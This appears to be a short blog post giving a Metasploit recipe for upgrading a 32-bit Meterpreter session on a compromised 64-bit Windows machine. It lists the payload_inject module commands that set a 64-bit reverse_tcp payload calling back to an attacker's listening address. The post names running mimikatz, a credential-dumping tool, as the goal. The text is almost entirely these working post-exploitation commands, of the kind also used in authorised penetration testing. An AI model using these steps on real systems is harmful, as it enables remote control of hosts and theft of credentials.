Converting a 32 bit Meterpreter to 64 bit
If you have a 32 bit Meterpreter session on a 64 bit Windows target, it's possible that you won't be able to perform certain tasks, like running mimikatz. In this case, you can upgrade your Meterpreter session, using these steps in Metasploit:
- use windows/local/payload_inject
- set session <session-number>
- set payload windows/x64/meterpreter/reverse_tcp
- set lhost <ip-address>
- run
Comments
Post a Comment